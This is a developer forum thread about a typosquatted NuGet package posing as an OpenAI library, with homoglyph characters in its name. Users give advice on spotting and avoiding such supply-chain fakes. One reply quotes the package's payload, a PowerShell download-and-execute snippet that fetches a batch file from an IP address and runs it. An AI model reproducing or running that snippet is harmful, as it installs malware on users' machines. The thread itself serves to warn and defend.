I’m using Visual Studio 2022 Enterprise, and I tried to install the following Nuget package:
[REMOVED BECAUSE MALICIOUS]
But I’m getting the following error:
Error MSB5016 The name “PkgOpеոAI” contains an invalid character “е”. The project file is invalid on disk and was not reloaded.
Using a unicode character inspector such as
this, it looks like instead of regular latin characters, the “e” and “n” are actually the following:
CYRILLIC SMALL LETTER IE
ARMENIAN SMALL LETTER VO
Sooo lol what? Is that actually an official package or some kind of fake?
Edit: Ok the package now looks super sus. I think it’s a fake, there are other packages by that same account also with weird characters in them, and all created 5 days ago)
Looking at the file I hope you rev up your anti-virus
$URL = "http://45.###.66.##/download/Anthrax.bat"
$FilePath = "C:\Windows\Temp\Anthrax.bat"
Invoke-WebRequest -Uri $URL -OutFile $FilePath
cmd.exe /c $FilePath
There was actually a fun article regarding this exact attack vector. Did ChatGPT write this repository?
Here’s the article:
ChatGPT can offer coding solutions, but its tendency for hallucination presents attackers with an opportunity. Here's what we learned.
Est. reading time: 9 minutes
Yeah, fake characters are usually a telltale sign of phishing. There’s been a lot of questions like “how did my API key get compromised”, and I think this is just one of the possibilities. Open AI API keys are quite valuable now as people can use them to generate fake reviews or whatever.
I’m personally skeptical enough that I do that part myself. It’s not hard to just do a POST call and handle the errors, and it looks like even the official OpenAI ones lag behind some of the latest changes.
Holy moly does Nuget even validate their packages?
There are no official packages for .NET.
community libraries are available for C# / .NET, as of now.
Let us know if you used one of them.
@ThioJoe 's channel was this → . ← close to turning into Elon Musk
Jokes apart, good thing it was noticed!
Apparently not. Lesson learned
Wow this is crazy, idk how many malicious stuffs could be uploaded.
What about Pypi?
Wow, I’ve used alot of random pypi packages in my time, I hope i don’t get a virus
@ThioJoe what can I do to prevent that?
Haha same here, I think you can prevent using root to install stuffs, that’s first, and only install known and trusted packages.